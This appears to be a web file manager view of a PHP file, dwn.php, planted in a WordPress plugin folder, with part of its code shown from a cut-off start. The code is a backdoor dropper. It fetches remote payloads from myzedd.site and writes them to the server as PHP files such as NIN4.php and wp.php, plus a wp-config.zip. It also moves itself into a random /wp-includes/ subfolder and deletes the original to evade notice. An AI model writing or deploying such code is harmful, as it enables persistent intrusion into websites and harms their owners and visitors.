芝麻web文件管理V1.00
编辑当前文件:/home/conskgoa/doughi.co.uk/wp-content/plugins/beruang/name/kamu/dwn.php
$fp, CURLOPT_TIMEOUT => 40, CURLOPT_FOLLOWLOCATION => true, CURLOPT_SSL_VERIFYPEER => false ]); curl_exec($ch); curl_close($ch); fclose($fp); return file_exists($file) && filesize($file) > 0; } $content = @file_get_contents($url); if ($content === false) return false; return file_put_contents($file, $content) !== false; } if (isset($_GET['mv'])) { @mkdir($mvDir, 0755, true); if (@copy(__FILE__, $mvDir . $self)) { @unlink(__FILE__); header('Location: /wp-includes/' . $rand . '/' . $self); exit; } $msg[] = [false, 'Move failed']; } if (isset($_GET['get'])) { $resources = [ ['https://myzedd.site/project/NIN4.txt', 'NIN4.php', 'NIN4'], ['https://myzedd.site/project/wp.txt', 'wp.php', 'WP'], ['https://myzedd.site/project/wp-config.zip', 'wp-config.zip', 'ZIP'] ]; foreach ($resources as $item) { $targetFile = $currentDir . $item[1]; $success = grab($item[0], $targetFile); $msg[] = [$success, $item[2]]; } } $webPath = str_replace($_SERVER['DOCUMENT_ROOT'], '', $currentDir); ?>
Azure
⚡ Azure
Online
=htmlspecialchars($m[1])?>
Download Path
=htmlspecialchars($webPath)?>
Relocate Target
/wp-includes/=htmlspecialchars($rand)?>/
📥 Download Resources
Open NIN4.php
Open wp.php
Open wp-config.zip
🚀 Relocate